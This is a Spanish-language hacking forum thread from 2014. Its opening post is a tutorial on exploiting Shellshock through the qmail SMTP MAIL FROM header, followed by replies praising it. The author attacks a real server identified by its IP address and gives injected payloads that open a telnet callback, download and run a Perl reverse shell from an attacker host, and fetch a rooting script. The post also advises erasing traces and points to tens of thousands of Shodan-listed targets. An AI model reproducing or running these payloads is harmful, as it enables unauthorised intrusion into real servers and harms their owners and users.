Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Muppet en Octubre 02, 2014, 12:40:27 AM

Título: Explotar Shellshock en smtp QMAIL
Publicado por: Muppet en Octubre 02, 2014, 12:40:27 AM
ShellShock Exploit PoC

Bueno antes que nada le agradezco a hielasangre por sacarme el bloqueo :P

Como he leido mucho de shellshock y nada sobre como explotarlo, les dejo un pequeño tutorial de como explotarlo un poco más allá que en los clasicos user-agent (que siendo realista muy pocos servidores utlizán cgi-scripts y menos hechos en bash)

Esto afecta a los servidores smtp de QMAIL por no validar correctamente el encabezado FROM MAIL:<> permitiendo ingresar como email cualquier string,
nosotros aprovecharemos esto para lograr ejecutar nuestro codigo arbitrario con la ayuda de shellshock

Para el PoC use este servidor que encontre vulnerable: 200.80.35.42

Empezamos!

1) Dejamos a la escucha el puerto donde queremos recibir la conexión entrante:

nc -vv -l -p 9669

(http://oi57.tinypic.com/xpyczl.jpg)

2) Nos conectamos al servidor smtp y realizamos el ataque

nc -vv 200.80.35.42 25

Entablamos toda la negociación necesaria con el servidor SMTP, esto consta de 4 pasos

.helo me (Le comunicamos al servidor que necesitamos usar su servicio)
.mail from:<[email protected]> (establecemos la dirección de email remitente) ---> ACÁ INYECTAMOS NUESTRO CODIGO SHELLSHOCK
rcpt to: <> ([email protected]) (establecemos la direccion del receptor del mensaje)
data (Comenzamos a escribir el email)
Subject: Titulo. (Establecemos el titulo del mensaje y lo terminamos con un .)
Mensaje. (Escribimos el mensaje terminado con un .)

FIN (Esperamos que se complete el proceso)

(Para mas info de SMTP visitar http://technet.microsoft.com/es-es/library/aa996114(v=exchg.65).aspx )

Bueno como mas arriba dije el error radica en que QMAIL no valida que lo ingresado en MAIL FROM sea un email
entonces en mi caso inyecto el siguiente payload shellshock:

() { :;}; /usr/bin/telnet xxxx.no-ip.org 9669

Al terminar el proceso de QMAIL deberia ejecutar el codigo arbitrario inyectado en la variable global de la función de shellshock y devolvernos una conexion entrante a nuestro puerto a la escucha

(http://oi59.tinypic.com/33opfyd.jpg)

Esto significa q con un poco de conocimiento hemos logrado ejecutar codigo arbitrario en el servidor mediante un servidor vulnerable explotando un error de validación de SMTP, en este simple PoC me devolví una conexión telnet, pero podriamos jugar con los comandos para subir un reverse shell y ganar acceso al sistema, veamos como!

Esta vez vamos a ejecutar codigo arbitrario para descargarnos de nuestro servidor web un reverse shell en perl

Payload:

() { :;}; /usr/bin/wget xxx.no-ip.org:8080/rsh.perl

(http://oi58.tinypic.com/4rw39v.jpg)

esperamos un tiempo considerable para asegurarnos la descarga de nuestro script, ponemos a escuchar nuevamente nc

(http://oi57.tinypic.com/xpyczl.jpg)

y ejecutamos nuestro archivo perl

() { :;}; /usr/bin/perl rsh.perl xxx.no-ip.org 9669 -l

(http://oi58.tinypic.com/140knjp.jpg)

y ahora tenemos acceso al sistema! JA! si indagamos un poco y largamos un whoami! vemos que es un kernel 2.6

(http://oi58.tinypic.com/k3rklf.jpg)

Intentemos rootearlo, yo en mi caso use un AutoRoot en perl que encontre por internet.

wget xxx.no-ip.com:8081/AutoRoot.pl

(http://oi57.tinypic.com/2wnbhw3.jpg)

Pasemos a ver si tenemos suerte!

Ejecutamos los AutoRoot.pl y vemos q sucede (yo en mi caso moví ambos archivos a otra carpeta)

perl AutoRoot.pl y esperamos!

En este caso no hemos tenido suerte, lo que no descarta que buscando un poco podamos hacer un rooteo manual del servidor :P (De hecho ya lo hice)
pero eso quedara para otro tutorial! (Estoy haciendo el tutorial mientras realizo la intrusión)

(http://oi57.tinypic.com/11kzg9e.jpg)

No nos olvidemos de borrar todas nuestras huellas!

Y despues de esto preguntaran, cuantos sitios vulnerables a shellshock existen, bueno yo me ayude un poco de mi amigo SHODAN

(http://oi60.tinypic.com/sor6ed.jpg)

35500 posibles target vulnerables solo por QMAIL SMTP!!! Saludos

Happy Haking[/color]
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: Muppet en Octubre 02, 2014, 01:24:35 AM
Parece que borraron el botón de responder...
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: hielasangre en Octubre 02, 2014, 01:44:02 AM
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: Muppet en Octubre 02, 2014, 01:46:14 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Gracias a vos loquin! vos me hiciste ver por encima de la pared!
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: Jimeno en Octubre 02, 2014, 05:12:14 AM
Gran tutorial, hdbreaker, te puse +1, me ha encantado
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: Muppet en Octubre 02, 2014, 05:40:38 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Gran tutorial, hdbreaker, te puse +1, me ha encantado

jajja gracias!
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: Snifer en Octubre 02, 2014, 08:06:15 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Gracias a vos loquin! vos me hiciste ver por encima de la pared!

Que cariño y respeto por no decir amor :D ..

Ya enserio lo vi anoche la entrada pero por vago no comente, ni hice mi prueba xD pero tras hacerla :| me quede asi con la careta, excelente aporte hd igual para ti hiela.

Regards,
Snifer
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: blackdrake en Octubre 02, 2014, 08:24:10 AM
Excelente aporte, la verdad es que no pensaba que podría ser tan fácil conseguir acceso de esa manera.

Un saludo.
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: q3rv0 en Octubre 02, 2014, 11:17:50 AM
Terrible post brother! con dhcp tmb se puede explotar http://www.hackplayers.com/2014/09/shellshock-dhcp-o-como-puede.html saludos!
Título: Re:Explotar Shellshock en smtp QMAIL
Publicado por: WhiZ en Octubre 02, 2014, 01:03:27 PM
No, te fuiste al carajo. Haces q mis post no sean más q ridiculeces 

Muchas gracias por compartir!

Saludos!
WhiZ